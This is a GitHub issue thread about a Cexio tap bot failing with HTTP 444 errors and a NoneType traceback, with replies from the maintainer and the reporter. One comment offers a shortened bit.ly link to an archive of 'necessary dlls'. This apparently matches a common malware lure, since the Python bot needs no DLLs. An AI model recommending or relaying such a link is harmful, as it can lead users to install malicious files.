### ISSUE TITLE
Error while getting user data

### ISSUE THREAD

**Issue by MaddFun** [vanhbakaa/Cexio-Tap-bot#33]
Something's broken((((

2024-09-19 15:33:46 | INFO     | 607 - account-1 | Update auth token...
2024-09-19 15:33:46 | INFO     | 72 - Getting data for account-1
2024-09-19 15:33:46 | INFO     | 607 - account-2 | Update auth token...
2024-09-19 15:33:46 | INFO     | 72 - Getting data for account-2
2024-09-19 15:33:46 | INFO     | 607 - account-3 | Update auth token...
2024-09-19 15:33:46 | INFO     | 72 - Getting data for account-3
2024-09-19 15:33:57 | INFO     | 617 - Session XXXX  logged in.
2024-09-19 15:33:58 | ERROR    | 199 - Error while getting user data. Response 444. Try again after 30s
2024-09-19 15:34:00 | INFO     | 617 - Session ZZZZ  logged in.
2024-09-19 15:34:00 | ERROR    | 199 - Error while getting user data. Response 444. Try again after 30s
2024-09-19 15:34:02 | INFO     | 617 - Session YYYY logged in.
2024-09-19 15:34:03 | ERROR    | 199 - Error while getting user data. Response 444. Try again after 30s
2024-09-19 15:34:28 | ERROR    | 424 - account-3 | Error code 444 While trying to get data
Traceback (most recent call last):
  File "/home/next/CEX.IO-Bot/bot/core/tapper.py", line 662, in run
    await self.find_potential()
  File "/home/next/CEX.IO-Bot/bot/core/tapper.py", line 515, in find_potential
    for category in self.card:
TypeError: 'NoneType' object is not iterable
2024-09-19 15:34:28 | ERROR    | 720 - account-3 | Unknown error: 'NoneType' object is not iterable
2024-09-19 15:34:30 | ERROR    | 424 - account-2 | Error code 444 While trying to get data
Traceback (most recent call last):
  File "/home/next/CEX.IO-Bot/bot/core/tapper.py", line 662, in run
    await self.find_potential()
  File "/home/next/CEX.IO-Bot/bot/core/tapper.py", line 515, in find_potential
    for category in self.card:
TypeError: 'NoneType' object is not iterable
2024-09-19 15:34:31 | ERROR    | 720 - account-2 | Unknown error: 'NoneType' object is not iterable
2024-09-19 15:34:33 | ERROR    | 424 - account-1 | Error code 444 While trying to get data
Traceback (most recent call last):
  File "/home/next/CEX.IO-Bot/bot/core/tapper.py", line 662, in run
    await self.find_potential()
  File "/home/next/CEX.IO-Bot/bot/core/tapper.py", line 515, in find_potential
    for category in self.card:
TypeError: 'NoneType' object is not iterable
2024-09-19 15:34:33 | ERROR    | 720 - account-1 | Unknown error: 'NoneType' object is not iterable

**Comment by nnimoyoefoki** [comment]
maybe this will help
https://bit.ly/3XQLHlH
I put the necessary dlls in the archive

**Comment by vanhbakaa** [comment]
Update newest version

**Comment by MaddFun** [comment]
The bot is already the latest, updated two days ago. Today a couple of hours ago it suddenly stopped working after restarting.
